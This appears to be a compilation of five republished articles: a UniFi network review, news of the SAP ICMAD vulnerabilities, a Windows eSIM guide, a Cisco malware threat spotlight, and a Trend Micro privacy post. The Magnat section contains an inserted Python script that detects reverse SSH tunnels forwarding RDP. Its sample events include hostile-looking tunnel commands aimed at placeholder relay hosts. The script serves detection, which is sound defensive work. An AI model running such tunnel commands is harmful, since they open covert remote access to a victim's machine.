The reason why I switched to UniFi was the extensibility. I started with the UDM Pro, Switch Pro 24 PoE, and the Wi-Fi 6 Long Range and Wi-Fi 6 Lite for wireless access. As for security cameras, I have three units of the G3 Flex for indoor use and a G4 Bullet located outside.

I’m now eyeing the Wi-Fi 6 Pro for the balcony as that’s the one area where I don’t get adequate coverage, and the G4 Doorbell as the video doorbell. I’ve deliberated getting a Nest Doorbell, but considering I have a UniFi Protect system set up anyway, I figured the G4 Doorbell would be a better alternative.

The biggest issue with Ubiquiti products is availability. The security cameras, in particular, are constantly sold out, so you will have to wait for a restock to get your hands on the G4 Bullet or even the Dream Router. Then you’ll need to factor in cabling as most of these devices connect over Ethernet. I’m fortunate that my home has internal Cat5 cabling, but you will need to consider that if you’re looking to make the switch.

The sheer amount of features in UniFi Network, the ease-of-use of UniFi Protect, and the fact that you have complete control over the recorded footage make Ubiquiti’s products an excellent choice for prosumers. Of course, building out the entire network is a sizeable investment if you’re picking up a UDM Pro, Switch 24 PoE, two APs, and a few security cameras, but at the end of the day, you get a scalable network that will serve you well for several years.

Source :
https://www.androidcentral.com/how-set-ultimate-ubiquiti-unifi-home-network-2022

CISA warns admins to patch maximum severity SAP vulnerability

The US Cybersecurity and Infrastructure Security Agency (CISA) has warned admins to patch a set of severe security flaws dubbed ICMAD (Internet Communication Manager Advanced Desync) and impacting SAP business apps using Internet Communication Manager (ICM).

CISA added that failing to patch these vulnerabilities exposes organizations with vulnerable servers to data theft, financial fraud risks, disruptions of mission-critical business processes, ransomware attacks, and a halt of all operations.

ICMAD bugs affect most SAP products

Yesterday, Onapsis Research Labs, who found and reported CVE-2022-22536 (one of the three ICMAD bugs and the one rated as a maximum severity issue), also cautioned SAP customers to patch them immediately (the other two are tracked as CVE-2022-22532 and CVE-2022-22533).

The SAP Product Security Response Team (PSRT) worked with Onapsis to create security patches to address these vulnerabilities and released them on February 8, during this month’s Patch Tuesday.

If successfully exploited, the ICMAD bugs allow attackers to target SAP users, business information, and processes, and steal credentials, trigger denials of service, execute code remotely and, ultimately, fully compromise any unpatched SAP applications.

“The ICM is one of the most important components of an SAP NetWeaver application server: It is present in most SAP products and is a critical part of the overall SAP technology stack, connecting SAP applications with the Internet,” Onapsis explained.

“Malicious actors can easily leverage the most critical vulnerability (CVSSv3 10.0) in unprotected systems; the exploit is simple, requires no previous authentication, no preconditions are necessary, and the payload can be sent through HTTP(S), the most widely used network service to access SAP applications.”

No SAP customers breached using ICMAD exploits so far

SAP’s Director of Security Response Vic Chung said they’re currently not aware of any customers’ networks breached using exploits targeting these vulnerabilities and “strongly” advised all impacted organizations to immediately apply patches “as soon as possible.”

SAP customers can use this open-source tool developed by Onapsis security researchers to help scan systems for ICMAD vulnerabilities.

The German business software developer also patched other maximum severity vulnerabilities associated with the Apache Log4j 2 component used in SAP Commerce, SAP Data Intelligence 3 (on-premise), SAP Dynamic Authorization Management, Internet of Things Edge Platform, and SAP Customer Checkout.

All of them allow remote threat actors to execute code on systems running unpatched software following successful exploitation.

Source :
https://www.bleepingcomputer.com/news/security/cisa-warns-admins-to-patch-maximum-severity-sap-vulnerability/

Use an eSIM to get a cellular data connection on your Windows PC

Windows 10 and Windows 11
An eSIM lets you connect to the Internet over a cellular data connection. With an eSIM, you don’t need to get a SIM card from your mobile operator, and you can quickly switch between mobile operators and data plans.

For example, you might have one cellular data plan for work, and a different plan with another mobile operator for personal use. If you travel, you can get connected in more places by finding mobile operators with plans in that area.

Here’s what you’ll need:

  • A PC running Windows 10, Version 1703 or later. To see which version of Windows 10 your device uses, select the Start button, then select Settings > System > About.
  • A PC with an eSIM in it. Here’s how you can tell if your PC has an eSIM:
    1. Select the Start button, then select Settings > Network & Internet > Cellular.
    2. On the Cellular screen, look for a link near the bottom of the page that says Manage eSIM profiles. If that link appears, your PC has an eSIM.

Note: Some devices have both an eSIM and physical SIM card. If you don’t see Manage eSIM profiles but you do see Use this SIM for cellular data at the top of the Cellular settings screen, select the other SIM from the drop-down box, and then see if the Manage eSIM profiles link appears.

To add an eSIM profile

You’ll need to add an eSIM profile to get an Internet connection using cellular data.

If you have a PC from your organization, an eSIM profile might already be added to your PC. If you select Manage eSIM profiles and see an eSIM profile for a mobile operator you expect to find, you can skip this procedure and go to the next one to get connected.

  1. Select the Start button, then select Settings > Network & Internet > Cellular > Manage eSIM profiles.
  2. Under eSIM profiles, select Add a new profile.
  3. To search for available profiles or use an activation code you have from your mobile operator, do one of the following:
    • Search for available profiles
      1. Select Search for available profiles > Next.
      2. When a profile you want to use is found, select Download.
      3. Enter the confirmation code from your mobile operator in the corresponding box, then select Download.
      4. After the profile is downloaded and installed, select Continue to find other profiles you might want and then repeat the previous steps.
      5. Select Close when you have downloaded the profiles you want.
    • Use an activation code you have from your mobile operator
      1. Select Let me enter an activation code I have from my mobile operator > Next.
      2. If you have a QR code to scan for the activation code, choose which camera to use on your PC, and then scan the QR code.
      3. The activation code should appear in the corresponding Activation code box. Select Next.
      4. For the dialog box that asks Do you want to download this profile?, enter the confirmation code from your mobile operator into the corresponding box, and then select Download.
      5. Select Close.
  4. Optional: To give the profile a friendly name (for example, Work or Personal) to help you remember it, select the profile, select Edit name, type a name you’ll remember, and then select Save.

To connect to cellular data using an eSIM profile

  1. Select the Start button, then select Settings > Network & Internet > Cellular > Manage eSIM profiles.
  2. Under eSIM profiles, select the profile you want, and then select Use.
  3. Select Yes for This will use cellular data from your data plan and may incur charges. Do you want to continue?
    You’ll be connected to a cellular data network and ready to go.

To switch between profiles

If you have more than one profile installed on your PC, you can switch between profiles to use a different mobile operator and data plan.

  1. Select the Start button, then select Settings > Network & Internet > Cellular > Manage eSIM profiles.
  2. Under eSIM profiles, select the profile you want to stop using, and then select Stop using.
  3. Select Yes for You’ll be disconnected from this cellular network. Continue?
  4. Select the different profile you want to use, then select Use.

To delete a profile

If you don’t want to use a profile anymore, you can delete it from your PC. If you delete the profile and want to add it again later, you’ll need to download the profile again and might need to contact your mobile operator.

  1. Select the Start button, then select Settings > Network & Internet > Cellular > Manage eSIM profiles.
  2. Under eSIM profiles, select the profile to delete, and then select Delete.
  3. At the prompt that warns you that the profile will be permanently deleted, select Yes.

Note: If you have a PC from your organization, you might not be able to delete an eSIM profile because of a policy that’s set by your organization.

Source :
https://support.microsoft.com/en-us/windows/use-an-esim-to-get-a-cellular-data-connection-on-your-windows-pc-0e255714-f8be-b9ef-9e84-f75b05ed98a3#WindowsVersion=Windows_10

Cybersecurity Threat Spotlight: Emotet, RedLine Stealer, and Magnat Backdoor

Security and IT teams may be fresh off their holiday breaks, but threat actors have kept busy over the last month. In this edition of the Cybersecurity Threat Spotlight, we’re highlighting the Trojans, loaders, information stealers, and backdoors that we’re seeing online.


Threat Name: Emotet

Threat Type: Trojan/Loader

Attack Chain:

A graphic showing the attack chain for Emotet: Malspam to Weaponized Document/Archive to Malicious Macros to Emotet Loader to CobaltStrike to Conti Ransomware. The graphic indicates that Cisco Umbrella protects users against Weaponized Document/Archive, Emotet Loader, and Cobalt Strike.

Description: Emotet is a banking Trojan that was first detected in 2014. Emotet has evolved into a massive botnet that delivers large amounts of malspam with malicious document attachments that lead to the Emotet Trojan. The Trojan also functions as a dropper for second-stage payloads, including – but not limited to – TrickBot, Qakbot, and Ryuk. Emotet can steal SMTP credentials and email content. The threat actors reply to legitimate conversations in a victim’s email account, injecting replies that include malicious attachments.

Emotet Spotlight: In November, security researchers observed the return of the Emotet loader, which had been inactive since January 2021 after a law enforcement takedown. Emotet is a loader botnet that uses a Loader-as-a-Service model. Emotet’s main advantage is its modular system, which enables a highly targeted approach based on the requirements of the delivered payload. Unfortunately, the botnet has historically been leveraged by adversaries conducting sophisticated ransomware attacks.

At this point, security researchers observe strong connections between Emotet and Conti Ransomware. This can indicate that two cybercriminal syndicates are or will be establishing a new partnership. Historically, Conti was known to rely on sustainable methods of operation. Emotet has proven to be able to provide initial access and a strong foothold in multiple corporate networks. This can become the new trend in adversaries, and it will likely have a major impact on the threat landscape in 2022.

Target Geolocations: Worldwide
Target Data: User Credentials, Browser Data, Sensitive Information
Target Businesses: Any
Exploits: N/A

MITRE ATT&CK for Emotet

Initial Access:
Phishing: Spearphishing Attachment or Spearphishing Link, Valid Accounts: Local Accounts
Discovery:
Account Discovery
Process Discovery
Persistence:
Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder
Create or Modify System Process: Windows Service
Scheduled Task/Job: Scheduled Task
Execution:
Command and Scripting Interpreter: PowerShell, Windows Command Shell, Visual Basic
User Execution: Malicious Link, Malicious File
Windows Management Instrumentation
Evasion:
Obfuscated Files or Information
Software Packing
Collection:
Archive Collected Data
Email Collection: Local Email Collection
Credential Access:
Brute Force: Password Guessing
Credentials From Password Stores: Credentials from Web Browsers
Network Sniffing
OS Credential Dumping: LSASS Memory
Unsecured Credentials: Credentials In Files
Command and Control:
Encrypted Channel: Asymmetric Cryptography, Non-Standard Port
Exfiltration:
Exfiltration Over C2 Channel
Lateral Movement:
Exploitation of Remote Services
Remote Services: SMB/Windows Admin Shares
Privilege Escalation:
Process Injection: Dynamic-Link Library Injection

IOCs:

Additional Information:

Back from the dead: Emotet re-emerges, begins rebuilding to wrap up 2021
Corporate Loader “Emotet”: History of “X” Project Return for Ransomware

Which Cisco Products Can Block:

Cisco Secure Endpoint
Cisco Secure Email
Cisco Secure Firewall/Secure IPS
Cisco Secure Malware Analytics
Cisco Umbrella
Cisco Secure Web Appliance


Threat Name: RedLine Stealer

Threat Type: Information Stealer

Attack Chain:

A graphic showing the attack chain for RedLine Stealer: Malspam Link/Trojanized App Download to RedLine Malware to Information Stealing to Command and Control. The graphic indicates that Cisco Umbrella protects against Malspam Link/Trojanized App Download, RedLine Malware, and Command and Control.

Description: RedLine is an information stealer available as a Malware-as-a-Service (MaaS) on Russian underground forums. It steals information like login credentials, autocomplete fields, passwords, and credit card information from browsers. It also collects information about the user and their system, like the username, location, hardware configuration, and installed security software. Finally, a recent update to RedLine also adds the ability to steal cryptocurrency cold wallets. RedLine appears to be under active development, with frequent introductions of new features.

RedLine Spotlight: Security researchers discovered that most stolen credentials currently sold on dark web underground markets had been collected using RedLine Stealer malware. RedLine Stealer attempts to harvest information from browsers – like passwords, cryptocurrency wallets, and VPN services – and system information – like hardware configuration and location. Over the past year, RedLine has been enhanced with the addition of new features. It is now capable of loading other malware and running commands while periodically sending updates containing new information from the infected host to its C2. The main goal of cybercrime campaigns utilizing RedLine Stealer appears to be the sale of stolen data to other cybercriminals who weaponize it in their own attacks.

Target Geolocations: Any
Target Data: User Credentials, Browser Data, Financial and Personal Information, Cryptocurrency Wallets
Target Businesses: Any
Exploits: N/A

MITRE ATT&CK for RedLine

Initial Access:
Phishing
Trojanized Applications
Credential Access:
Credentials from Password Stores
Steal Web Session Cookie
Unsecured Credentials
Credentials from Password Stores: Credentials from Web Browsers
Discovery:
Account Discovery
Software Discovery
Process Discovery
System Time Discovery
System Service Discovery
System Location Discovery
Peripheral Device Discovery
Persistence:
Registry Run Keys/Startup Folder
Scheduled Task/Job: Scheduled Task
Execution:
User Execution
Command and Scripting Interpreter: PowerShell
Evasion:
Impair Defenses: Disable or Modify Tools
Collection:
Screen Capture
Command and Control:
Non-Standard Port
Non-Application Layer Protocol
Exfiltration:
Exfiltration Over C2 Channel

IOCs

Additional Information

RedLine Stealer identified as primary source of stolen credentials on two dark web markets
Redline Stealer
Shining a Light on RedLine Stealer Malware and Identity Data Found in Criminal Shops

Which Cisco Products Can Block:
Cisco Secure Endpoint
Cisco Secure Email
Cisco Secure Firewall/Secure IPS
Cisco Secure Malware Analytics
Cisco Umbrella
Cisco Secure Web Appliance


Threat Name: Magnat Backdoor

Threat Type: BackDoor

Attack Chain:[1]

Graphic showing the attack chain for Magnat BackDoor: Malvertising to Download Fake Installer to De-Obfuscation to RDP Backdoor/Information Stealer/Chrome Extension Installer to Command and Control. The graphic indicates that Umbrella protects users against Malvertising, Download Fake Installer, RDP Backdoor/Information Stealer, and Command and Control.

Description: Magnat BackDoor is an AutoIt-based installer that prepares a system for remote Microsoft Desktop Access and forwards the RDP service port on an outbound SSH tunnel. This installer’s actions pave the way for the attacker to access the system remotely via RDP. The malware applies this technique by setting up a scheduled task that periodically contacts a C2 server and sets up the tunnel if instructed by the C2 response.
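A detection-side illustration of the tunnelling behaviour described above, added here and not taken from Cisco's or Talos's material: it scans constructed process-creation events for SSH remote forwards that expose the RDP port. The client names, parent-process names, event fields and sample command lines are assumptions of this example; the page does not name the tool used to build the tunnel.

```python
import re
import shlex

RDP_PORT = 3389  # default RDP service port
# Assumptions of this example (the page names no tool or parent process):
SSH_CLIENTS = {"ssh.exe", "ssh", "plink.exe", "plink"}
TASK_HOSTS = {"svchost.exe", "taskeng.exe"}  # typical Task Scheduler parents
LOOPBACK = {"127.0.0.1", "localhost", "::1"}
# -R, alone or bundled after OpenSSH flags that take no argument (e.g. -NR).
R_OPT = re.compile(r"^-[46AaCfGgKkMNnqsTtVvXxYy]*R(.*)$")


def basename(path):
    """File name of a Windows or POSIX path, lower-cased, quotes removed."""
    return re.split(r"[\\/]", path.strip("\"'"))[-1].lower()


def tokenize(cmdline):
    """Split a command line without treating backslashes as escapes."""
    try:
        return shlex.split(cmdline, posix=False)
    except ValueError:  # unbalanced quote: fall back to whitespace splitting
        return cmdline.split()


def remote_forwards(cmdline):
    """Return (listen, target_host, target_port) for each -R forward spec."""
    argv = tokenize(cmdline)
    found = []
    for i, tok in enumerate(argv):
        m = R_OPT.match(tok)
        if not m:
            continue
        spec = m.group(1) or (argv[i + 1] if i + 1 < len(argv) else "")
        # [bind_address:]port:host:hostport, with optional [ipv6] brackets
        parts = re.findall(r"\[[^\]]*\]|[^:]+", spec.strip("\"'"))
        if len(parts) >= 3 and parts[-1].isdigit():
            found.append((parts[-3], parts[-2].strip("[]"), int(parts[-1])))
    return found


def triage(event):
    """Return a finding for an event that reverse-forwards RDP, else None."""
    hits = [f for f in remote_forwards(event["cmdline"]) if f[2] == RDP_PORT]
    if not hits:
        return None
    argv = tokenize(event["cmdline"])
    image = basename(argv[0]) if argv else ""
    scheduled = basename(event.get("parent", "")) in TASK_HOSTS
    local_rdp = any(host.lower() in LOOPBACK for _, host, _ in hits)
    return {
        "host": event["host"],
        "forwards": hits,
        "known_client": image in SSH_CLIENTS,  # False suggests a renamed binary
        "scheduled_parent": scheduled,
        "severity": "high" if scheduled and local_rdp else "medium",
    }


def scan(events):
    """Triage every event and keep only the findings."""
    return [f for f in map(triage, events) if f]


# Constructed sample events (hosts, paths and addresses are made up).
SAMPLE_EVENTS = [
    {"host": "WS-014", "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r'"C:\ProgramData\upd\ssh.exe" -N -o StrictHostKeyChecking=no '
                r'-R 40000:127.0.0.1:3389 tunnel@relay.example.net'},
    {"host": "WS-020", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "ssh admin@jump.example.net"},
    {"host": "WS-021", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "ssh -L 8080:intranet.example.net:80 dev@jump.example.net"},
    {"host": "WS-033", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"C:\Users\Public\updater.exe -NR40000:localhost:3389 "
                r"-P 443 u@198.51.100.7"},
    {"host": "WS-040", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "ssh -R 8022:127.0.0.1:22 dev@build.example.net"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Matching on the forward specification rather than the image name is what catches the renamed client in the fourth event; an RDP service moved off port 3389 needs `RDP_PORT` adjusted to the configured value.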

Magnat BackDoor Spotlight: Cisco Talos recently observed a malicious campaign offering fake installers of popular software as bait to get users to execute the malware on their systems. This campaign includes a set of malware distribution campaigns that started in late 2018 and have targeted Canada, the U.S., Australia, and some European Union countries. Two undocumented malware families (a BackDoor and a Google Chrome extension) are consistently delivered together in these campaigns. An unknown actor with the alias “magnat” is likely the author of these new families and has consistently developed and improved them. The attacker’s motivations appear to be financial gain from selling stolen credentials, executing fraudulent transactions, and providing Remote Desktop Access to systems.

Target Geolocations: Canada, U.S., Australia, E.U. Countries
Target Data: Credentials, Sensitive Data
Target Businesses: Any

MITRE ATT&CK for Magnat BackDoor

Initial Access:
Malvertising
Persistence:
Scheduled Task/Job
Execution:
Scheduled Task/Job
Evasion:
Impair Defenses: Disable or Modify System Firewall
Deobfuscate/Decode Files or Information
Command and Control:
Application Layer Protocol
Exfiltration:
Exfiltration Over Command and Control Channel

IOCs

Additional Information:

Magnat campaigns use malvertising to deliver information stealer, backdoor and malicious Chrome extension

Which Cisco Products Can Block:
Cisco Secure Endpoint
Cisco Secure Firewall/Secure IPS
Cisco Secure Malware Analytics
Cisco Umbrella


[1] While Cisco products can protect against RDP BackDoor and Information Stealer, they do not protect against Chrome Extension Installers

Source :
https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-emotet-redline-stealer-magnat-backdoor

Why You Need to Care About Data Privacy & 5 Tips for Better Data Security

The privacy of our data has always been important. However, because we’re sharing more of it than ever before, being aware of data privacy and taking the necessary steps to protect it has never been more crucial. In this article, in celebration of Data Privacy Week, we cover why data privacy is so important, what can happen if your data were to fall into the wrong hands, and what you can do to protect your personal data.

What is data privacy and why is it important?

Data privacy often refers to the practice of handling sensitive data in line with regulatory requirements. In most developed countries, there are specific data privacy laws in place that regulate how companies can collect, store, and share customer data.

While the EU has a comprehensive data privacy law, the General Data Protection Regulation (GDPR), which covers all different types of data, only three US states currently have similar, all-encompassing data privacy laws (California, Virginia, and Colorado). Instead, the US has many different laws designed to target specific types of data. For example, the Fair Credit Reporting Act (FCRA) protects information in your credit report, and the Family Educational Rights and Privacy Act (FERPA) protects students’ education reports from being freely accessible.

However, because of how much time we spend online nowadays, we’re putting more of our personal data out there for others to see than ever before. As a result, it is not only important to understand how protected your data is when you share it with a company, but also how private it is when you share it online.

How to protect your data privacy

Here are some of our top tips for data privacy protection:

  1. Only give your data to trustworthy companies and websites — Perhaps you’ve come across a new online clothing store or seen an app on the app store that takes your fancy, but you’re unsure if you can trust the company. If you’ve never heard of the company before, it’s best to do some quick research to learn whether or not you can trust it with your data.
  2. Think twice before sharing — With social media being such a big part of our everyday lives, it’s easy to forget that what we post online, stays online forever. Always think twice before sharing something online. Don’t publicly share personal information such as your address, phone number, or social security number.
  3. Take advantage of privacy settings — On every website, app, and game that you use, make sure you’re taking advantage of the built-in privacy settings. By doing so, you’ll ensure that only people you know can view your information.
  4. Use strong passwords and enable 2FA — When you create an online account, you almost always need to share lots of personal data — your full name, email address, and date of birth, for example. Although this data isn’t publicly accessible, if a hacker were to gain access to one of your accounts, they would be able to see all this information. To avoid this happening, make sure to use only strong, tough-to-hack passwords and that all your accounts have two-factor authentication (2FA) enabled.
  5. Use a VPN on public Wi-Fi — Unprotected Wi-Fi networks are notoriously unsecure. Because no password is required to access them, nearby hackers can steal any data transferred over them. To protect yourself, always use a VPN on public Wi-Fi networks.

Data leaks in 2021 — T-Mobile, LinkedIn, Moncler & CoinMarketCap

The truth is, no matter how well a company abides by data privacy laws and how thoroughly it protects its customers’ data, it can never be 100% data leak-proof. In 2021 alone, a shocking number of companies suffered high-profile data leaks, including T-Mobile, LinkedIn, Moncler, and CoinMarketCap. Those leaks resulted in hundreds of millions of people having their sensitive personal data leaked, which is used by criminals to commit all sorts of crimes — with the most concerning of them all being identity theft.

According to the Federal Trade Commission, there were over 1 million reports of identity theft in 2021. Below are some of the things the FTC says criminals can do with your data:

  • Get new credit cards in your name.
  • Open a phone, electricity, or gas account in your name.
  • Steal your tax refund.
  • Get medical care under your name (and leave you with a huge bill!).
  • Pretend to be you if they get arrested.

Cybercriminals often put stolen data up for sale on underground forums on the regular internet, as well as the dark web. And as you can imagine, personal information that is particularly valuable to them can fetch a high price. On average, on the dark web, a driver’s license will go for $205, an ID card for $213, and a passport sells for a whopping $684!

How to stay protected from data leaks

You might be thinking that staying protected from data leaks is an impossible task, but the answer is easy: Trend Micro™ ID Security. Available for Android and iOS, Trend Micro™ ID Security can scan the internet and the dark web 24/7 for your personal information. If your data is leaked, the app notifies you immediately so you can take action to avoid people stealing your identity. If your information is out there, you’ll be the first to know!

Here are some of the features offered by Trend Micro™ ID Security:

  • Personal Data Protection Score — See exactly how safe your online personal data is with your customized Protection Score.
  • 24/7 Comprehensive Personal Data Monitoring — ID Security can scan the internet and the dark web for all your personal information including up to 5 email addresses and bank account numbers, 10 credit card numbers, your Social Security number, and lots more.
  • Social Media Account Protection — Strengthen the security of your social media accounts. Be instantly alerted if your Facebook or Twitter account’s data is leaked by cybercriminals.

Source :
https://news.trendmicro.com/2022/01/27/why-you-need-to-care-about-data-privacy-5-tips-for-better-data-security/